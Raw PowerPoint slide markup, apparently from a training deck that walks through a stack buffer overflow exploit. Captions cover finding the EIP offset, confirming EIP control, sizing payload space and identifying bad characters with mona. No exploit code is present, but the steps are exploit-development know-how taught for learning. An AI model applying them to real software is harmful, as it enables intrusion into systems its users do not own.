          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="335360" y="1480172"/>
            <a:ext cx="8458200" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DB03807-4363-4D45-ADEA-4DC770A14E2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="327455" y="2585072"/>
            <a:ext cx="4067175" cy="1104900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5306029A-1ECC-47B4-B0B0-418564115E58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4394932" y="2564904"/>
            <a:ext cx="60575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Put the pattern in the filler and run it again. *Make sure you get rid of the while loop in the Python file – you only need one transmission</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{638501A5-F3DD-4FD2-B7D5-8B08CC300141}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5303912" y="4111003"/>
            <a:ext cx="3200400" cy="1266825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{749E4E0A-74DB-47B6-902A-07E14DB56CA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5303912" y="5179281"/>
            <a:ext cx="1057324" cy="2105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EAFBBBFB-75D6-473D-9C56-7F97D58C217F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6904112" y="4994615"/>
            <a:ext cx="38225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EIP contains random value at crash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F50DC63D-ED10-45FC-974F-E3C0DB93F299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5281257" y="5815352"/>
            <a:ext cx="5791200" cy="714375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C883A7F8-953C-463B-87F2-A78E3ABE79CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5303911" y="5998444"/>
            <a:ext cx="2600193" cy="2491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DE4F996F-EB63-4AE7-A07D-65651B8E4701}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8400384" y="6123001"/>
            <a:ext cx="22195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Offset is 1978 bytes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A60D4102-F8ED-48FF-9D63-FF5238D7B554}"/>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Finding the Offset</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36479819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6F-EB63-4AE7-A07D-65651B8E4701}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6924092" y="5791200"/>
            <a:ext cx="4464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The C’s stop at the memory offset 0x228, which is 552 bytes in decimal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{628C5B85-EEBF-41A2-8E19-2FE097F170FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="390525" y="3068960"/>
            <a:ext cx="3790950" cy="2238375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B7A1953-755B-4726-BE16-B0D3F23D4BA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5356031" y="2888940"/>
            <a:ext cx="2419350" cy="2238375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76D9C3E8-C9C4-47A3-8E10-F96DD8857315}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7562258" y="3201518"/>
            <a:ext cx="4239217" cy="2257740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24E78DD2-D5CF-4128-8E9C-1F0406E225D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4752218" y="1339817"/>
            <a:ext cx="534022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Add 4 “B” to the EIP variable and 1500 “C” to the post – This will help find how much space we have for the payload and confirm we can control the EIP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5A115F0-6426-40AA-9611-1873194BBD2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="115192" y="1267627"/>
            <a:ext cx="4371975" cy="1276350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1824EF1F-AFDE-4C54-9754-E9B5719FE5BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587388" y="4130997"/>
            <a:ext cx="931942" cy="1888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FAB28312-05FA-4099-8CB1-65AA620BFBD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619716" y="3870883"/>
            <a:ext cx="2104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We control the EIP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE54277C-ADDE-4409-B38F-5E037367FD66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5527202" y="4761148"/>
            <a:ext cx="1936949" cy="1888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CA93381-5959-489A-BE03-5DC5A720D26F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7643687" y="4690863"/>
            <a:ext cx="972594" cy="2590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itle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AB3FBAC-7F74-4FB7-AF77-09AC7BE10C18}"/>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Checking the EIP and Space</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="610553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AB28312-05FA-4099-8CB1-65AA620BFBD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407369" y="4690546"/>
            <a:ext cx="43564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Add array of all possible bytes  to the python file, minus 0x00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85002A40-26F9-48C8-8471-4D328E45721C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407369" y="1272704"/>
            <a:ext cx="55086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Use mona for easier comparison – set up a working folder and create a byte array without 0x00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A0F5EFF-9FE4-4614-AEC4-7F2153BCA58C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="994523" y="2677574"/>
            <a:ext cx="1895475" cy="247650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33620299-0596-47C7-BC62-D049D25FDD12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="255692" y="2192811"/>
            <a:ext cx="2876550" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E2AE850-B487-4652-930B-8F62EFB34440}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3503712" y="2011349"/>
            <a:ext cx="3182834" cy="1374745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BDD4369-8307-49EE-8316-579F5CAE5A2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257076" y="3930644"/>
            <a:ext cx="5508612" cy="2677370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEEDE0E2-A40B-4742-97E6-15685A9F9AD1}"/>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Finding Bad Characters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3639676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84E27E-A532-4235-B928-7D07B6AD40A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="244984" y="1132549"/>
            <a:ext cx="104955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After running the exploit again, check the memory location to find bad characters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF410097-AB74-4943-8409-3300432BD93B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="244984" y="1627901"/>
            <a:ext cx="1462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MANUALLY:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA1C3811-04CF-466B-8A42-48E0A36E0B1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="19725"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="257461" y="2039822"/>
            <a:ext cx="5533044" cy="1370214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3CC5DD4-9052-4853-84AA-C43570353128}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2905770" y="3170392"/>
            <a:ext cx="2884734" cy="2396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FAB28312-05FA-4099-8CB1-65AA620BFBD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2902852" y="2116814"/>
            <a:ext cx="40458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Enter the memory address where the character array starts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F20E898-431C-497F-9355-E3755F8FE152}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6960096" y="1784713"/>
            <a:ext cx="4500500" cy="1311268"/>
            <a:chOff x="7320136" y="3773916"/>
            <a:chExt cx="4500500" cy="1311268"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Picture 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{112EFE05-781F-43B4-B5F9-01E1C076BC65}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7320136" y="4185084"/>
              <a:ext cx="4500500" cy="900100"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1824EF1F-AFDE-4C54-9754-E9B5719FE5BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7360302" y="4284315"/>
              <a:ext cx="1508006" cy="2608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854454D1-A6B2-4B09-9511-6952930F00ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8616280" y="3773916"/>
              <a:ext cx="14029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Stack pane:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52F2E8FB-38E9-4A52-A67C-DC7D6AEFF200}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581043" y="3682896"/>
            <a:ext cx="7303489" cy="2812671"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82D0C2A3-60A2-446B-9739-70F55CE2E0E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="83890" y="3959727"/>
            <a:ext cx="320379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Manual inspection finds 6 bad characters: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07, 08, 2E, 2F, A0, A1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Bad characters, in this case, show up as bytes other than what they should be</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Oval 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D93F336B-E1A1-4B31-90D0-616B6A6EA473}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6039564" y="3753036"/>
            <a:ext cx="704507"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977510FC-DCA2-4649-B4F6-D0FAA6E086EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8004211" y="4028732"/>
            <a:ext cx="704507"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61EF7EC8-0B2E-4691-9855-64A90A575050}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8616280" y="4993615"/>
            <a:ext cx="396044"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648CC73-E3B4-4D95-A2CD-14699790E148}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4348137" y="5148279"/>
            <a:ext cx="396044"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itle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D878EB84-92AF-4F19-AEF8-B7368F901DED}"/>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Finding Bad Characters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="385862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84E27E-A532-4235-B928-7D07B6AD40A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="244984" y="1132549"/>
            <a:ext cx="104955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After running the exploit again, check the memory location to find bad characters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF410097-AB74-4943-8409-3300432BD93B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="244984" y="1627901"/>
            <a:ext cx="1595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WITH MONA:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1">
            <a:extLst>
